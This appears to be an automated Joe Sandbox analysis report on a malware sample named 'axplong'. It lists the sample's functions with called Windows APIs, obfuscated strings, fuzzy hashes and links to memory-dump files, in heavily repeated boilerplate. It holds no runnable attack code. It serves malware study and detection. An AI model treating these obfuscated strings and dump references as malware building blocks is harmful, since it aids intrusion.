Instruction ID: f0bc6c87dcdcce0029a3b238353fff4536cffce4c6e8e9ea6ba3bea93a5d859c
Opcode Fuzzy Hash: 1185cfafaa40104b7aaa1b7d67607b4ea142b12b21663fe9a2d6e5a4e61f50cd
Instruction Fuzzy Hash: 3BE1AF71900228ABEB24DFA4CC89BDEB779AF04304F5442D9E509A7291DB74AFC4DF91

Function 00F27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F27EA3

Strings

JmpxRL==, xrefs: 00F28062
JmpxQb==, xrefs: 00F281B2
JmpyPb==, xrefs: 00F2810A

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 54279810fccbf79715bcd9186f270b0259bace29d7b6f5405e9c4ed50feb8fb5
Instruction ID: 73f45769666ac24bd370443be280727ca453dda3657c6d4992c8809f7c8b95f5
Opcode Fuzzy Hash: 54279810fccbf79715bcd9186f270b0259bace29d7b6f5405e9c4ed50feb8fb5
Instruction Fuzzy Hash: 3DD11C71E00628DBDF14BB28EC4A3AD7771AB46720F544288E415A73D2DB399E81A7D3

Function 00F56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00F56E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00F56E7D
__dosmaperr.LIBCMT ref: 00F56F12

Part of subcall function 00F57177: __dosmaperr.LIBCMT ref: 00F571AC

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 451fb5c0ca57802b5ada8655bcefbd45c4effb99b1686a625aa7d6d61395453a
Instruction ID: 9c8122f6f152d340ab59b2733833a9259cfee6f89693ef21139034f7ff179f94
Opcode Fuzzy Hash: 451fb5c0ca57802b5ada8655bcefbd45c4effb99b1686a625aa7d6d61395453a
Instruction Fuzzy Hash: 0E415E75D00304ABCB24EFB5EC459ABBBF9EF48311B10451DFA66D3611EB34A908EB60

Function 00F5D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7380882f10e659e598bc72e740310152b40d0d5d8fd9e896302a0117f11f3a6b
Instruction ID: 2bfc555d832f33ecabb7d7d7a3e112210ecd2176c6b6160d8f93a049b9d153a6
Opcode Fuzzy Hash: 7380882f10e659e598bc72e740310152b40d0d5d8fd9e896302a0117f11f3a6b
Instruction Fuzzy Hash: C1611572D026148FDF35EFA8D8857EDB7A0EF45327F284116DE48AB250E6309C49EB51

Function 00F282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00F28454

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: fbc4c7caa470af820d57ad85e4e3935d8db93275d7b137e8fa671d5653c47d11
Instruction ID: ed1d2de3c94e95f8aba27f05d4c51b77c2fd91fd8d9e125adabd6eb2e086fdd9
Opcode Fuzzy Hash: fbc4c7caa470af820d57ad85e4e3935d8db93275d7b137e8fa671d5653c47d11
Instruction Fuzzy Hash: 94515971D01228DBEB24FB78EC497EDB775DB45350F5042A8E804A72C1EF359E809B91

Function 00F56C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c491bcc6c866dfb7e6eaf4a0dd80ac800bbd90a791334413f28d45262d3700
Instruction ID: 599bcf94552f23389560cecee4162a0536967f159acbc6537b85ed28e56153bc
Opcode Fuzzy Hash: 45c491bcc6c866dfb7e6eaf4a0dd80ac800bbd90a791334413f28d45262d3700
Instruction Fuzzy Hash: 0C212B72A05608BAEB11BB649C42BAF37399F4133AF600710FF346B1D1DB745D09A6A1

Function 00F56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00F56FB3

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 986171aa4ee47ae5848b687d7cc5a3dd5f16263c85043615bec7b29281919a3f
Instruction ID: cdd19275eb18c20e5fd213c5960e56de4842c654e24a529cf567dd4e5d8a6f5f
Opcode Fuzzy Hash: 986171aa4ee47ae5848b687d7cc5a3dd5f16263c85043615bec7b29281919a3f
Instruction Fuzzy Hash: 2011EF72D0020CAADB10DE95D945EDFB7FCAB48321F505666FA21E7180E734EB48DBA1

Function 00F5D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00F5A5ED,?,00F574AE,?,00000000,?), ref: 00F5D731

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 07e653f8b48192670dc50b339b28413586c74f4a3795820f0d2440413a340ebc
Instruction ID: d2da2a83c449c72a11e59739db574088108843064a5e7ed63fbb306b6801ba21
Opcode Fuzzy Hash: 07e653f8b48192670dc50b339b28413586c74f4a3795820f0d2440413a340ebc
Instruction Fuzzy Hash: F9F0E932D07625A69B317A227D05B5B3B89DF897B3B194111AE04EA181CB24D80977E0

Function 00F36AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00F36B65

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 221692a975f0e3eeb0ad0f02b51b13b06d200c3e54aa3e7a9335d8b552428f3f
Instruction ID: f749f31dff97c474f88a02e83e49c24f97cd161cc736962fa53c457b9bac215f
Opcode Fuzzy Hash: 221692a975f0e3eeb0ad0f02b51b13b06d200c3e54aa3e7a9335d8b552428f3f
Instruction Fuzzy Hash: CAF0A971E40618ABC710BB689D0775DBB75AB46B70F900358E811672E1DB34A90067D3

Function 052003C3 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ca714364c6e1b261efb956ddf7814f4dbedb7835cd3b31860423ec4affb691
Instruction ID: 7abcdefac443a8935a45d2ecd94e26278fa74ff09a48fd14f2edf1c8f27f5ee5
Opcode Fuzzy Hash: 88ca714364c6e1b261efb956ddf7814f4dbedb7835cd3b31860423ec4affb691
Instruction Fuzzy Hash: 4E113AF717E140AEB382D681A3587B62B6BEEC72303B1A467F047CA583E1D44D464634

Function 052003B2 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b70bfad30f42466f4e3ae8049c28de61050cfb0db17f77c2528bee13b78242
Instruction ID: 5a67214eee33ad7bf4188641a4a72f92910c8fd2f912414afe0722fa0a7d0637
Opcode Fuzzy Hash: 10b70bfad30f42466f4e3ae8049c28de61050cfb0db17f77c2528bee13b78242
Instruction Fuzzy Hash: 39016DEB17E010BE7282D5866B08BB6666FEAD63303B0A427F44BC6683D6D44E495139

Function 052003AD Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9802ae443ffd6d21a27ba94653048afe42ba49ba9b59528251901c6cc6f2031b
Instruction ID: fae4e44b161dfd6537b395187e50645c22f8239a664d2801dd1b971b994fcfa2
Opcode Fuzzy Hash: 9802ae443ffd6d21a27ba94653048afe42ba49ba9b59528251901c6cc6f2031b
Instruction Fuzzy Hash: 660180F717F010BE7382C5866B0CBB6266FE9D63303B0A427B44BC6683D6D44E495139

Function 052003E5 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fc3fa1b4d13a7cbe248ea2915e3157899326536613ad7cfc7f33637e0196ba
Instruction ID: 62d02f1f852d8ae77a77cd2db7eef4ae5693538d88979a4e5e85fa6e0a4006e0
Opcode Fuzzy Hash: a6fc3fa1b4d13a7cbe248ea2915e3157899326536613ad7cfc7f33637e0196ba
Instruction Fuzzy Hash: 0E01DEE717E000BD32C2C58167487B62B6BEED72303B0A426F447C6A83D2D40E495239

Function 05200400 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 927b82e59a98ff204a3bc0fe26620789a09a60116ae4ca2f92b1bf980706ccb6
Instruction ID: a5fb991a4da2b2fd7f2d7f8e294a5f1429e9e7c2634e33d357c9a4fcbdb1df0e
Opcode Fuzzy Hash: 927b82e59a98ff204a3bc0fe26620789a09a60116ae4ca2f92b1bf980706ccb6
Instruction Fuzzy Hash: B0F0F4BB1BE010BD32C2C182670D7B6262BEAD72303B0A427F047C6683EAC44E491139

Function 05200410 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eba333f60b1321cf487518ee677f8336b7ddc064e7bc4209f562137adc20c71
Instruction ID: b80efda7aacdb8a85827a3630dfd2aafd41858e1716cd60c99f591fc84afb3c0
Opcode Fuzzy Hash: 1eba333f60b1321cf487518ee677f8336b7ddc064e7bc4209f562137adc20c71
Instruction Fuzzy Hash: 72F0AFBB1BE014BE73C2D58667087B96A2BEAD72303B0A426B047C6683D6D44A491139

Function 05200435 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075f74a085a21844c7c76cad9af724910c7b577cad415ab356d57dcb205c7457
Instruction ID: de7fd0d69101ff9651b2a30c550d221ee90e7681940ff9d2955440f6fb5f43f5
Opcode Fuzzy Hash: 075f74a085a21844c7c76cad9af724910c7b577cad415ab356d57dcb205c7457
Instruction Fuzzy Hash: C9E0A0A607E150BD33C2C546270877A2A1BAAD72303F0A426B04BC1683D6C40A441139

Function 05200442 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d97db08e011b1d330e39aa4fd5d7c80f70258a459cdd05c62f3382259ce3ac01
Instruction ID: 657d58e514d756112c92bf1b18e20488f5354e51d845c87242ea364d771f38b9
Opcode Fuzzy Hash: d97db08e011b1d330e39aa4fd5d7c80f70258a459cdd05c62f3382259ce3ac01
Instruction Fuzzy Hash: F8E09BA707F194BC73C2D146630D3752A1B9DD72313F0946BF487C5683D5C50655513D

Function 05200460 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba01fffb5665850f330d842f859a3d51215ca413e4c6c3f990269e287d70bc4
Instruction ID: 09512a329a086e331727636224f57c7edadbfd1d941d27be994cbce410823c3a
Opcode Fuzzy Hash: 2ba01fffb5665850f330d842f859a3d51215ca413e4c6c3f990269e287d70bc4
Instruction Fuzzy Hash: ACE068E60BE150BCB2C684422305BB66B0BAEF72303F0A5ABF04382B83D1C90A58113D

Function 05200455 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2989594543.0000000005200000.00000040.00001000.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5200000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e0e851e3b9a8551e4793ee8b308355fc10ec324ff21917865a536b7e0436dc9
Instruction ID: 133f6cbb2e31c60389d8dda127779b57febc5294dd1845ea68b0436c8b6241e9
Opcode Fuzzy Hash: 8e0e851e3b9a8551e4793ee8b308355fc10ec324ff21917865a536b7e0436dc9
Instruction Fuzzy Hash: 57E026E70BE150BD72C3858A230C7752A0B6EE71303F0D523F047C2A8395C506581139

Non-executed Functions

Function 00F2E440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON

Download Yara Rule

Strings

MT==, xrefs: 00F2E4A5
UD==, xrefs: 00F2EA1F, 00F2EC66
GqKudSO2, xrefs: 00F2E47F
WWt=, xrefs: 00F3088D
MJB+, xrefs: 00F2E734
#, xrefs: 00F30534
WWp=, xrefs: 00F304DA
WGt=, xrefs: 00F2F62D, 00F2F90A
fed3aa, xrefs: 00F2FA9E
111, xrefs: 00F2F6B0
246122658369, xrefs: 00F2F647, 00F2F924, 00F304F7, 00F308AA

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: da9d12db54206bd6faba3b9919db5a8068826434fcda754e74efe9945f499dd2
Instruction ID: 0d91adaec4603eb83ff9f2ded9bfe39c03d7cec0a417cd836e8f13cdd2c2fed6
Opcode Fuzzy Hash: da9d12db54206bd6faba3b9919db5a8068826434fcda754e74efe9945f499dd2
Instruction Fuzzy Hash: 7982F47090428CDBEF14EF68C9497DD7FB6AB46314F608198E805673C2C7799A88DBD2

Function 00F63068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00F631E3

Strings

1#SNAN, xrefs: 00F6437A
1#QNAN, xrefs: 00F64381
1#INF, xrefs: 00F6439E
1#IND, xrefs: 00F64373

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
